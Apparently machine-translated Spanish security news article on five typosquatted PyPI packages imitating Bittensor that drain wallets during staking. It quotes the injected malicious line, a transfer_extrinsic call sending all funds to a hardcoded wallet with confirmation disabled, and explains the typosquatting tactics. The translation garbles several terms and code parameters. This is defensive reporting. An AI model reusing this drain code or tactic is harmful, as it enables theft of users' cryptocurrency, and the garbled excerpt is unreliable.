Ha surgido una sofisticada campaña de robo de criptomonedas dirigida al ecosistema Bittensor a través de paquetes maliciosos de Python distribuidos a través del Índice de paquetes de Python (PYPI).
El ataque aprovecha las técnicas de tipogratación para engañar a los desarrolladores y usuarios para instalar versiones comprometidas de paquetes legítimos de Bittensor, lo que finalmente resulta en un drenaje de billetera completo durante las operaciones de referencia de rutina.
La campaña maliciosa fue orquestada con precisión, con los cinco paquetes tipográficos publicados en una ventana concentrada de 25 minutos el 6 de agosto de 2025.
Estos paquetes incluyeron variaciones como “bitensor” (faltante ‘t’), “bittenso” (truncado) y “Qbittensor” (prefijo), todos diseñados para imitar los auténticos paquetes Bittensor y Bittensor-Cli.
Los atacantes eligieron estratégicamente los números de versión 9.9.4 y 9.9.5 para igualar las versiones legítimas de los paquetes, maximizando la probabilidad de instalación accidental a través de errores tipográficos de desarrolladores o errores de copia.
Analistas de Gitlab identificado La amenaza a través de su sistema automatizado de monitoreo de paquetes, que marcó actividades sospechosas relacionadas con los paquetes populares de Bittensor.
El descubrimiento reveló un ataque cuidadosamente diseñado que explota la confianza que es inherente a las operaciones de blockchain de rutina, específicamente dirigida a los usuarios dedicados a actividades de participación que generalmente poseen propiedades sustanciales de criptomonedas.
Análisis del mecanismo de replanteo secuestrado
La sofisticación técnica del ataque radica en su modificación quirúrgica de la funcionalidad de apuestas legítima dentro de la función STAKE_EXTRINSIC ubicada en bittensor_cli/src/commands/stake/add.py.
En la línea 275, los atacantes insertaron un código malicioso que subvierte por completo el proceso de apuestas esperado:-
Result = await transfer_extrinsic (subtensor = subtensor, wallet = wallet, destino = “5fjgkupzaqhax3hxsskntue8e7moeyjtgrddgxbvczxc1nqr”, cantidad = monta, transfer_all = true, indicador = falso)
Esta inyección de código funciona con eficiencia devastadora estableciendo transfer_all = verdadero para drenar las billeteras enteras en lugar de solo la cantidad de apuestas prevista, mientras que ADRAT = FALSE omite los diálogos de confirmación del usuario.
La dirección de billetera de destino codificada sirve como punto de recolección para fondos robados, que posteriormente se distribuyen a través de una red de lavado de múltiples saltos que involucra varias billeteras intermedias antes de alcanzar la dirección de consolidación final.
Equipe su SOC con el acceso completo a los últimos datos de amenazas de cualquiera. Obtenga una prueba gratuita de 14 días
